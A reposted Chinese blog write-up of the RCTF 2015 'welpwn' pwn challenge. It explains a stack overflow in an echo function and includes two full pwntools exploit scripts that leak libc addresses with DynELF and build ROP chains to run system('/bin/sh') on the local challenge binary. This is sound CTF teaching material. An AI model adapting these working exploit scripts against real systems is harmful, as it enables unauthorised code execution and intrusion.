RCTF-200 welpwn 地址泄露实例

最新推荐文章于 2022-11-28 17:31:30 发布
最新推荐文章于 2022-11-28 17:31:30 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: CTF 文章标签: ctf-地址泄露

转载地址:http://blog.csdn.net/SmalOSnail/article/details/53436113

题目来源

RCTF 2015 welpwn
http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b

题目分析

先获取程序的基本信息:
info

然后用ida静态分析程序代码,main函数如下:
main

主函数中read()函数读取了1024个字节的数据,随后调用echo函数:
echo

可以看到echo函数栈桢的大小是20h

echo函数中存在一个循环赋值,循环次数是read函数读的数据的长度,如下图:
vuln

由于echo函数的栈桢大小(20h)远小于read函数可以读取的数据长度(400h),在进行循环赋值的时候,echo函数保存在栈中的返回地址会被覆盖。

下图是输入为"A"*12 + "B"*12 + "C"*4时,程序执行到循环赋值时栈的情况:
overflow

高亮的部分是echo函数的返回地址,它即将被覆盖。
over

解题思路

由于程序设置了栈不可执行,可以构造ROP链,泄露libc中的函数

  1. 泄露libc,获取system,gets等函数地址
  2. 构造gets(bss);'/bin/sh'写入bss
  3. 构造'system("/bin/sh")'得到shell

解题过程

使用Linux_x64中通用的gadgets构造ROP链
gadgets

首先收集一些需要用到的信息,包括bss段的地址、main函数地址、程序中已有函数的地址、gadgets地址……

使用ROPgadgets寻找gadgets(用于构造ROP链):
gad

main函数地址(用作返回地址):
main

bss段开始地址(用于存储字符串’/bin/sh’):
bss

gets(plt)函数地址(用作泄露内存):
gets

构造ROP链,泄露内存:

rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
payload = "A" * 24 + p64(ppppr) + rop

    利用pwnlibDynELF模块泄露libcsystemputs地址:

    def leak(addr):
    rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
    payload = "A" * 24 + p64(ppppr) + rop
    p.sendline(payload)
    p.recv(27)
    tmp = p.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return '\x00'


d = DynELF(leak, elf=ELF('welpwn'))


system = d.lookup('system', 'libc')
gets = d.lookup('gets', 'libc')

      构造ROP链将'/bin/sh'写入bss段,并执行system("/bin/sh"):

      rop = p64(poprdi) + p64(bss) + p64(gets) + p64(poprdi) + p64(bss) + p64(system) + p64(0xdeadbeef)


payload = "A"*24 + p64(ppppr) + rop

        解题脚本

        这里有两个脚本,第一个是我自己写的,第二个是参考fuchuangbob的脚本。自己写的时候没有想到可以利用pop rdi; ret这个gadgets,写的略显复杂,但是构造ROP链的部分写的比较详细,不熟悉ROP链构造的同学可以看下exp1exp2比较高级,代码也很简练,我从中也学到了不少:D

        exp1.py

        #!/usr/bin/python 
# only use general gadgets
from pwn import *


p = process('welpwn')
context(arch='amd64', os='linux')


# load program
elf = ELF('welpwn')


# infomation
read_got = elf.symbols['got.read']
log.info("read_got = " + hex(read_got))


write_got = elf.symbols['got.write']
log.info("write_got = " + hex(write_got))


main = elf.symbols['main']
log.info("main = " + hex(main))


# overflow point
buflen = 24


# gadgets
mmmcall = 0x400880
ppppppr = 0x40089a
ppppr = 0x40089c


# junk code
padding = 0xdeadbeef


# need leak libc
# function 1 get system addr
# write(1, address, 8)
flag = 0
def leak(address):
    global flag
    payload = ""
    payload += "Q" * buflen
    payload += p64(ppppr)       
    payload += p64(ppppppr)
    rbx = 0
    rbp = 1
    r12 = write_got
    r13 = 8
    r14 = address
    r15 = 1
    ret = mmmcall
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
    ret = main
    payload += p64(padding) * 7 + p64(ret)


    p.recvuntil('RCTF\n')
    p.sendline(payload)


    if flag:
        p.recv(0x1b)
    data = p.recv(8)
    log.info("recv: " + str(data))
    flag += 1
    return data


d = DynELF(leak, elf=ELF('welpwn'))


system = d.lookup('system', 'libc')
log.info("system addr = " + hex(system))


#system = 0x7ffff7a60e10
bss = 0x601300
payload = ""
payload += "P" * buflen
payload += p64(ppppr)
payload += p64(ppppppr)
rbx = 0
rbp = 1
r12 = read_got
r13 = 17
r14 = bss
r15 = 0
ret = mmmcall
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
payload += p64(padding) * 7 + p64(ret)


p.recvuntil("RCTF\n")
p.sendline(payload)
sleep(1)
p.sendline("/bin/sh\0"+ p64(system))


# # function check bss 
# # write(1, bss, 16)
check = ""
check += "C" * buflen
check += p64(ppppr)
check += p64(ppppppr)
rbx = 0
rbp = 1
r12 = write_got
r13 = 16
r14 = bss
r15 = 1
ret = mmmcall
check += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
check += p64(padding) * 7 + p64(ret)


p.recvuntil("RCTF\n")
p.sendline(check)
sleep(1)
p.recv(0x1b)
log.info("recv:" + p.recv(16).encode('hex'))


# function 3 get shell
# system(bss)
payload = ""
payload += "R" * buflen
payload += p64(ppppr)
payload += p64(ppppppr)
rbx = 0
rbp = 1
r12 = bss+0x8
r13 = bss
r14 = bss
r15 = bss
ret = mmmcall
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
payload += p64(padding) * 7 + p64(ret)


p.recvuntil("RCTF\n")
p.sendline(payload)


sleep(0.5)
p.recv()
p.interactive()

          exp2.py

          #!/usr/bin/python 
from pwn import *
p = process('welpwn')
#context.log_level = 'debug'
ppppr = 0x40089c
poprdi = 0x4008a3
main = 0x4007cd
puts_plt = 0x4005a0
bss = 0x601070


p.recvuntil("RCTF\n")
def leak(addr):
    rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
    payload = "A" * 24 + p64(ppppr) + rop
    p.sendline(payload)
    p.recv(27)
    tmp = p.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return '\x00'


d = DynELF(leak, elf=ELF('welpwn'))
system = d.lookup('system', 'libc')
log.info("system addr = " + hex(system))
gets = d.lookup('gets', 'libc')
log.info("gets addr = " + hex(gets))


# gets(bss); system(bss);
rop = p64(poprdi) + p64(bss) + p64(gets) + p64(poprdi) + p64(bss) + p64(system) + p64(0xdeadbeef)
payload = "A"*24 + p64(ppppr) + rop
p.sendline(payload)
sleep(1)
p.sendline('/bin/sh\0')


p.interactive()

            源码下载

            https://github.com/TaQini/pwn/tree/master/welpwn

            _well_s
            关注
            • 0
              点赞
            • 3
              收藏
              觉得还不错? 一键收藏
            • 0
              评论
            专栏目录
            linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
            weixin_34185033的博客
            05-01 661
            一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
            welpwnctf题目
            shanwei274的博客
            04-06 263
            记录一道自己做的ctf题目:welpwnRCTF-2015 1.老生常谈checksec查看: 可以看到只开了nx保护,下面我们进入ida下面看看。 发现是一个想rbp-400,rsp+0h的地方read进入恰好0x400的数据,然后调用了echo函数,我们进入echo看看。 发现了一个简化版的strcpy函数,第一反应溢出溢出!但是这里由于在复制过程中遇到’0x00‘会被截断,所以64位下我们打包的p64(pop_rdi)+p64(binsh_addr)+p64(system)可能复制不到一半就
            [pwn]ROP:信息泄露获取libc版本和地址
            热门推荐
            Breeze的博客
            08-26 1万+
            文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
            [PWN] 泄露libc HarekazeCTF_2019_baby_rop2
            最新发布
            LDX的博客
            11-28 670
            pwn 64位 泄露libc版本
            RCTF - Exploitation 200 welpwn - writeup
            HiTaQini
            12-02 2916
            RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
            RCTF-2015-notsequence WP
            qq_41252520的博客
            09-05 1437
            前言 这道题目有多解,但是只有一组解是flag。再次提醒自己,搞逆向的数学一定要学好,至少大学之前的数学还能有印象! 分析 程序无花无壳,直接IDA反编译。 结构很清晰,分别来看这两个 check 函数。 通过测试可以得知这些 下标 的含义,如果我们用符号来作为输出,就会很清晰了: 然后这个函数检测的就是行 i 的数字之和 v3 = 2i。其实数学好的话,仅看这个函数就立马想到是 杨辉...
            s7-200 smart PLC modbus通讯实例
            04-24
            S7-200 Smart PLC Modbus 通讯实例 本文档介绍了 S7-200 Smart PLC 与 ACS510 变频器 Modbus 通讯实例,涵盖了 Modbus 通讯协议、S7-200 Smart PLC 编程、ACS510 变频器参数设置、S7-200 Smart PLC 与 ACS510 变频...
            s7-200应用实例
            03-16
            标题“s7-200应用实例”指的是对西门子S7-200系列PLC(可编程逻辑控制器)的实际应用案例的介绍和分析。S7-200是西门子自动化与驱动集团生产的一款小型控制器,广泛应用于自动化领域,尤其适合小项目和小型机械设备...
            s7-200模拟量输入输出实例.pdf
            07-13
            S7-200模拟量输入输出实例主要涉及西门子S7-200系列PLC中的模拟量模块EM235的应用,包括模拟量输入输出的编程、转换公式推导、模块连接以及实际编程实例。对于初学者来说,理解和编程模拟量模块相比常规的位变量控制...
            S7-200 SMART编程示例.smart
            07-30
            S7-200 SMART 自由口通信超时处理实例 S7-200 SMART通过PROFINET连接V90 PN实现基本定位控制 S7-200 SMART与RFID读写器的通信含指令库 S7-200 SMART与S7-200 S7通信例程 S7-200 SMART与S7-200 SMART PUTGET向导例程 ...
            西门子S7-200PLC编程实例精解
            03-16
            西门子 200PLC 编程实例,经典解析。 介绍了关于西门子S7-200PLC编程实例精解的详细说明,提供S7-200的技术资料的下载。
            RTD1295 GPIO pinux
            09-02
            RTD129x-AN02-GPIO-Pin-Mux-Description_v01 RTD129x-AN02-GPIO-Pin-Mux-Description_v01 RTD129x-AN02-GPIO-Pin-Mux-Description_v01
            RCTF2015 pwn试题分析
            weixin_30764137的博客
            05-13 167
            pwn200 漏洞给的很明显,先是读到了main的局部数组中,然后在子函数中向子函数的局部数组栈里复制。 总体思路是leak system的地址,然后再向一个固定地址写入/bin/sh,最后执行system函数 leak使用pwn库的DynELF实现,整体使用rop链。 1 //ida伪代码 2 int __fastcall echo(__int64 a1) 3 { 4 ...
            welpwnRCTF-2015)--write up
            ATFWUS的博客
            03-12 920
            文件下载地址: 链接:https://pan.baidu.com/s/1MG2z9r4wz_WTEz1vIikqJQ 提取码:3tbc 0x01.分析 checksec: 源码分析: 流程非常简单,首先输入一个1024大小字符串,然后进入函数echo,这个函数会将buf的数据一个字节一个字节的复制到s2中,...
            RCTF2015 welpwn: 200 writeup
            fuchuangbob的专栏
            06-14 2380
            题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制: 0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ‘A’*24 + p64(0x
            RCTF-2015——welpwn
            05-11 325
            64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
            welpwn RCTF-2015 攻防世界
            qq_41071646的博客
            06-03 1641
            参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
            pwntools实战CTFpwn题
            Yale的博客
            01-30 2663
            Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mips/pow...
            [XCTF-pwn] 10-welpwn-rctf-2015
            weixin_52640415的博客
            02-26 236
            很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
            西门子S7-200 PLC编程实例应用详解
            S7-200编程实例 Siemens S7-200是一款功能强大且广泛应用于工业自动化领域的可编程逻辑控制器(PLC)。本文将对S7-200编程实例进行详细的解释和分析,涵盖了模拟电位器、高速计数器、自由通信口模式、脉宽调制、步...
            评论
            添加红包

            请填写红包祝福语或标题

            红包个数最小为10个

            红包金额最低5元

            当前余额3.43前往充值 >
            需支付:10.00
            成就一亿技术人!
            领取后你会自动成为博主和红包主的粉丝 规则
            hope_wisdom
            发出的红包
            实付
            使用余额支付
            点击重新获取
            扫码支付
            钱包余额 0

            抵扣说明:

            1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
            2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

            余额充值